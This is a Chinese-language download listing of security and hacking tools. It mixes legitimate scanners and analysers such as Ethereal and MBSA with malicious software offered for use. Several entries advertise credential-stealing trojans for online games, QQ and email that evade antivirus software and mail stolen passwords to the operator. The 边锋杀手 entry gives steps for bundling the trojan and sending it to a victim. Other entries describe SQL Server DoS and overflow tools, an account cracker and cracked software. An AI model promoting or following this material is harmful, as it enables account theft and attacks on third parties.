-plugin --- PLUGIN扫描;
-all --- 检测以上所有项目;

 

SQL Server 溢出漏洞扫描器
绿盟的SQL漏洞扫描软件。

 

Patching SQL 1.2
现在MSSQL的漏洞闹得很厉害，打补丁很麻烦，因为又要查sql版本，又要查sql的service pack,还要知道是什么语言版本，有的打了补丁后mssql又不能用了,所以写了这个小程序"暂时性"地帮mssql打补丁。
原理很简单，是将程序写成服务，因为mssql启动是比较慢的，这程序是会比mssql服务启动快些的，程序启动后就查看mssql服务是否有运行，如果还没有运行的话等待10秒直到mssql服务运行。当查看到mssql在运行，马上向mssql发向可以得到shell的那些代码.因为mssql被这些代码攻击一次后，那漏洞就会暂时地"消失"的了，直到重启，但重启后这个程序又会给mssql继续打补丁。
V1.2
1.加快打补丁速度
2.连续进次sp0和sp1的shellcode攻击
3.将SQL.Log删除，当系统重启后再打补丁前。

程序是以服务安装的，执行程序就可以看到帮助。

 

HawkEye 0.1
采用多线程方式对指定IP地址段进行安全漏洞检测，支持插件功能。

 

Packit V0.3.5dPackit 是一款网络分析软件，用来监视和处理网络中的IPv4(soon IPv6)数据包TCP/UDP/ICMP通信，这对于测试防火墙，入侵检测系统，端口扫描和一般的ICP/IP审核很有价值。当前版本支持定义几乎所有的Ethernet，TCP和UDP头选项，同时也支持ICMP数据包插入和包捕捉。该软件需要libnet 1.1.0+和libpcap 支持，运行在FreeBSD和Linux平台之上。

Packit - Packit was originally designed as a learning tool for myself. It offers you the ability

to monitor, manipulate and inject IPv4 (and soon IPv6) traffic (TCP/UDP/ICMP) on and into your

network. This can be valuable in testing firewalls, intrusion detection systems and in general

TCP/IP auditing.

 

m6.3-BETA2-linux-bin-x86.tar.gz
一个集合12个远程漏洞的扫描器，内附了多个非常好用的exploit程序。

 
 

 

cgiscanner.zip
一个多线程的CGI漏洞扫描器,速度狂快,可以自定义cgi漏洞列表,内付原码,命令行方式,使用说明:
Usage: cgiscanner.exe host result-file

Usage: cgiscanner.exe <目标> <扫描报告文件> <端口>

 

MSSQL 工具集合
MS SQLServer 的工具集合，包含有SQLPing, SQLScanner, SQLCracker, SQLDOS等几个工具。

SQLPing.exe： 一个探测SQL服务器信息的小工具，就好比PING主机一样。
SQLScanner: SQLSERVER扫描工具，一次扫描一个B段IP，并将结果记录进一个文本文件中。
SQLDOS.exe： 一个伪造源地址象SQLSERVER发送大量UDP包的程序。
SQLCracker.exe: 多线程破解SQLSERVER帐号的工具，能动态判断SQLSERVER使用的TCP端口。
SQLOverflowDos.exe: 利用MS02-039的UDP漏洞，将SQLSERVER服务溢出中断。
SQLDOSStorm: SQLSERVER的UDP风暴，漏洞情况请见MS。使用大量SQLSERVER列表向一台目标攻击。

 

Apache Chunked Scanner v1.0.3
The Retina Apache Chunked Scanner 是 eEye 公司开发的一款Apache 分块编码缓冲区溢出漏洞扫描软件，可同时扫描254个IP，如果它发现存在漏洞的IP，就会记录下来，系统管理员只要通过双击该IP，就可以获得该漏洞的修补方法...

 

CyberCop Scanner 5.5
CyberCop Scanner 5.5 是NAI安全公司出品的Win NT/2000 下的一款网络安全评估扫描软件...

 

东方卫士--系统漏洞专查工具 2002.06.21
东方卫士--系统漏洞专查工具 Build 2002.06.21
互联网的深入普及真是有利有弊，在我们获取大量新鲜资讯的同时，系统、软件漏洞以及病毒的传播速度均比以前的单机时代快了几百上千倍。今天上午爆出的一个漏洞，也许下午就四海皆知，晚上就能被别有用心的人利用。防火墙？它们可不会告诉你漏洞究竟在哪里。东方卫士系统漏洞专杀工具将为你检测如下内容：
1、隐藏在注册表中的自动运行程序；
2、系统中的不安全共享；
3、网络漏洞；
4、由于Word、IE以及Outlook等引起的安全隐患。

 

Shadow Database Scanner 3.01 汉化破解版
Shadow Database Scanner 3.01 汉化破解版，SDS 是俄罗斯Shadow系列工具的一款针对数据库的扫描软件，此软件几乎完全采用Shadow Security Scanner的界面，使用过SSS的朋友应该能很快上手！

 

Rafale X V1.3
Rafale X V1.3，这是一款非常有用的防火墙测试工具，它允许你阻止防火墙规则生效和工作...还有- DNS LookUp - Finger - HTTP Header - Whois 等功能。

 

CGI Hole Hunter 1.0
基于命令行的一个cgi漏洞扫描器，它与其它专业扫描器的差别在于，它是专门找某个漏洞的程序，可以大范围扫描，有时可以事半功倍，速度找到对方区域内有漏洞的主机。

 

天堂之手试用版
本程序可准确截取传奇游戏登陆ID,密码，服务器等，全面支持传奇最新版。
随计算启动自动启动，可躲避个大杀毒软件。测试版只显示部分密码，不自动运行，正式版可远程截取，随计算机自动运行.软件显示详细级别，区号，服务器件采用线程技术，防查杀

 

KFSensor Version 1.3.0
KFSensor Version 1.3.0
KFSENSOR的优点：

1）准确性比较强，防火墙与其他的IDS常常会被一些“合法”了的网络通信所“迷惑”，从而被RULE所“曲解”,而KFSENSOR是不会分辨所有的连接中谁是合法，谁是不合法的。

2）低成本，KFSENSOR会在被攻击时以假睡眠方式来“欺骗”攻击者，并且只使用了极少的处理时间与网络资源。 它安装在用户的计算机时是不会影响其他程序的正常进行的，并且不需要其他附加的硬件。

3）使用简便。当你使用了KFSENSOR时就会很快得发现到这一点了。它的配置与操作到是以直线的“方向”进行的， 这只需要你看看说明，修改一下就可以正常使用了。

4）实时探测功能。只要在运行此程序，报告攻击与分析结果都会在很短的时间里完成。

5）探测未知的数据攻击，KFSENSOR不像其他的产品，它是不会依靠已知的攻击类型数据去探测的，它可以动态得探测其他新型的攻击。

6）安全的“渗透性”。KFSENSOR可以补足其他安全产品的不足，并提供附加层次的安全性。

7）只要一个管理员就通过配置监视与管理整个组织的HONEYPOT监视器了。

 

Ethereal 0.9.12
这是一款免费的网络协议分析程序，支持Unix、Linux、Windows，它可以直接从网络上抓取数据进行分析，也可以对由其他嗅探器抓取后保存在硬盘上的数据进行分析。你能交互式地浏览抓取到的数据包，查看每一个数据包的摘要和详细信息。Ethereal有多种强大的特征，如支持几乎所有的协议、丰富的过滤语言、易于查看TCP会话经重构后的数据流等。这里提供的是WINDOWS平台下的版本，若需要其它系统的版本请自行访问作者主页下载。

 

网页密码记录机0.1A测试版
可以记录网页中的各种用户名和密码，因此不单是可以对邮箱有效，对其它需要验证的例如论坛等都有效。（针对IE）

 

Hiddukel VI pro
Hiddukel 系列的 VI -NinJo- 加强版，汲取保留了前几个版本的所有功能和优点，减少了生成的客户端的体积，增加了直接截取内存数据的全新功能，并提供了发送邮件时是否进行进程插入的选择。

 

传奇毁灭者测试版
此程序为传奇盗号工具，但它又不同于一般的键盘记录程序，因此无论您是使用复制/粘贴或者是通过键盘录入，它都能正确截取传奇登陆区域+服务器+用户名+密码及修改密码、注册新用户里的所有信息并将其发送到指定信箱，并会自动过滤私服与重复记录！注册版的只有15K大。

 

ComLog 1.01
这个工具可以在后台监听所有调用cmd.exe的动作,记录到/winnt/help下的一个指定目录,这对监控服务器安全运行状况非常有帮助. 使用前把Winnt/System32/目录下的cmd.exe改名cm_.exe，把comlog101拷贝到
Winnt/System32/下，然后转到Winnt/Help/创建一个新的目录用来保管ComLog历史文件就可以了。内含perl源程序。

 

盗密高手 1.0
监视被监视端(装了此程序的电脑)上QQ、邮箱等各种密码，并发送到您设置的邮箱。
第一次运行本程序时进入设置对话框进行设置，发送、接收信箱经过加密处理，请务必填准确否则可能无法接收到邮件。选取“下次启动时隐藏”在下次启动时就不会出现启动界面。
确定后，您可以测试您设置的发送、接收信箱是否可用，测试成功将会收到一份确认信，一切完毕后退出重新运行该程序即可！

 

MUspy1.7
MUspy1.7,将奇迹MU的用户名和密码发到指定的信箱，能得到第几区，但不能得到第几服务器，只有自己试了。

末注册时可以用100次!

 

边锋杀手3.0
边锋杀手是一款<<边锋在线游戏>>密码的安全工具。
　
文件列表:
资料设置文件--Benset.exe
密码监控文件--Benpao.exe
生成资料文件--Msread.dt
专用捆绑文件--Benbin.exe

使用方法:
1、本机使用。先运行设置端程序进行设置,设置成功
　 后按提示再运行密码监控端程序,密码监控端运行
时,正常情况下不会出现任何提示和警告。最后为
了保密请删除当前所有文件,而边锋杀手已经自动拷贝
并在后台工作了。
2、捆绑使用。先运行设置端程序进行设置,完成后会
　 在当前路径下生成一个资料文件:Msread.dt。之后
　 可以利用自带的捆绑工具BENBIN.EXE对边锋杀手进行
　 修饰捆绑， 这时可以在任何机上运行这个捆绑程
　 序,当然还可以通过发送给对方运行。

 

U-Scan
新版 U 漏洞扫描器（界面友好，速度快，扫描结果直接生成HTM文件）

 

Suker s scanner
功能强大的扫描嚣,可扫多种CGI漏洞.端口扫描功能更是强大,可以自调线程.速度和功能是绝不逊色于superscan

 

Baseline Security Advisor
为了重新赢回大众信心，微软计划发行一套有精灵按步就班指引的安全程序, 以协助软件用户和网络管理员保护计算机系统的安全。

此一软件称为Baseline Security Advisor(MBSA)，可扫瞄Windows操作系统与微软软件中尚未修补的程序、容易破解的密码以及漏洞。

新版MBSA中加入了使用者教育与一些额外的检查功能，让Windows 用户可确保系统的修补档案都是最新的，且密码都符合正确的设定方式，且也都很清楚哪些设定可能会较不安全。

与一般漏洞扫瞄程序不同的是，MBSA并非以攻击者角色来寻找漏洞，而是以管理员专家的身份寻找微软安全清单上的问题。

MBSA档案下载有700KB，内含微软用XML所做成的漏洞与修补文件数据库。微软会定期维护数据库，并免费提供这套软件。
 
 

---

锁定 | 推荐 | 打印 | 关闭 举报该信息为不良信息>> http://03050401.home.sunbo.net/show_hdr.php?xname=365MG01&dname=&xpos=9 (2007-11-25 12:11:00)